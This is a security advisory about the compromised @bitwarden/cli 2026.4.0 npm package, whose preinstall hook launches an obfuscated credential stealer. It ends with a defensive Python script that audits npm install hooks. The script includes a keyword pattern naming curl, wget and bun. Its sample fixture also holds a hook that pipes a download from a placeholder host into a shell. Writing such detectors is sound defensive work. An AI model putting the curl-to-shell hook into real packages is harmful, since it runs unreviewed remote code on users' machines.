www.stepsecurity.io 4/23/2026, 3:31:38 PM · via preferred

Bitwarden CLI npm package hijacked to steal developer secrets


According to StepSecurity, @bitwarden/cli@2026.4.0, the official Bitwarden CLI, was found compromised on npm. The package carried a malicious preinstall hook that silently bootstraps the Bun runtime and launches a 9.7 MB obfuscated credential stealer targeting developer secrets, GitHub Actions environments, and AI tool configurations such as ~/.claude[.]json and MCP server configs.

The stolen data is encrypted with AES-256-GCM and exfiltrated to audit.checkmarx[.]cx, a domain impersonating Checkmarx, and when GitHub tokens are present the malware weaponises them to inject malicious workflows and extract CI/CD secrets, turning a single compromised machine into a supply chain attack pivot point.

Harden Runner blocked the outbound connection during a controlled test, preventing exfiltration at the network layer. The attack chain includes a Bun runtime download from github[.]com/oven-sh/bun/releases, and the payload bundles a multi-target credential harvester with explicit targeting of AI tool credentials. Indicators of compromise include a version mismatch between package[.]json and the embedded metadata. Disclosures dated 23 April 2026 list remediation steps including downgrading to 2026.3.0 and rotating all credentials.
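As an added detection example (not code from the StepSecurity or CyberSIXT report), the following Python script audits an installed npm tree for two of the signals described above: the known-compromised @bitwarden/cli@2026.4.0 version, and npm lifecycle install hooks (preinstall, install, postinstall), which run automatically during `npm install`. The keyword heuristic that flags hooks invoking a runtime or downloader (bun, curl, wget, and so on) is an assumption based on the reported chain, not a rule from the report. The sample tree it builds is constructed; every package other than @bitwarden/cli, and every hook command, is a placeholder.

```python
"""Audit an npm install tree for lifecycle install hooks and a known-bad
package version. Detection aid written for this page; not from the report."""
import json
import os
import re
import tempfile

# Known-compromised name/version pair taken from the report.
COMPROMISED = {("@bitwarden/cli", "2026.4.0")}

# Lifecycle scripts npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Assumed heuristic: whole-word matches for tools a hook should rarely need.
SUSPICIOUS_RE = re.compile(r"\b(bun|curl|wget|powershell|base64)\b", re.I)


def audit_package(pkg_json_path):
    """Return a list of findings (dicts) for one package.json, [] if clean."""
    with open(pkg_json_path, encoding="utf-8") as fh:
        meta = json.load(fh)
    name, version = meta.get("name", "?"), meta.get("version", "?")
    findings = []
    if (name, version) in COMPROMISED:
        findings.append({"package": name, "version": version,
                         "kind": "known-compromised-version"})
    for hook in INSTALL_HOOKS:
        cmd = meta.get("scripts", {}).get(hook)
        if not cmd:
            continue
        findings.append({"package": name, "version": version,
                         "kind": "install-hook", "hook": hook, "command": cmd,
                         "suspicious": bool(SUSPICIOUS_RE.search(cmd))})
    return findings


def audit_tree(root):
    """Walk a directory (e.g. a project root) and audit every package.json."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            results.extend(audit_package(os.path.join(dirpath, "package.json")))
    return results


def build_sample_tree():
    """Constructed sample node_modules tree (placeholder packages/commands)."""
    root = tempfile.mkdtemp()
    samples = {
        # Only the name/version here come from the report; the hook command is a placeholder.
        "@bitwarden/cli": {"name": "@bitwarden/cli", "version": "2026.4.0",
                           "scripts": {"preinstall": "node scripts/preinstall.js"}},
        # Plain library with no install scripts.
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0"},
        # Legitimate native build step: flagged as a hook, but not suspicious.
        "native-addon": {"name": "native-addon", "version": "3.2.1",
                         "scripts": {"install": "node-gyp rebuild"}},
        # Hook that pipes a download into a shell: flagged as suspicious.
        "fake-installer": {"name": "fake-installer", "version": "0.0.1",
                           "scripts": {"postinstall":
                                       "curl -fsSL https://example.invalid/setup.sh | sh"}},
    }
    for folder, meta in samples.items():
        pkg_dir = os.path.join(root, "node_modules", *folder.split("/"))
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return root


if __name__ == "__main__":
    for finding in audit_tree(build_sample_tree()):
        print(finding)
```

Run it against a real checkout with `audit_tree("path/to/project")`; every install hook is worth a glance, but a hook matching the heuristic, or any package on the known-compromised list, should block the install until reviewed. A clean result says nothing about a hook that was already executed, which is why the report's remediation pairs the downgrade with rotating all credentials.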


Article by CyberSIXT
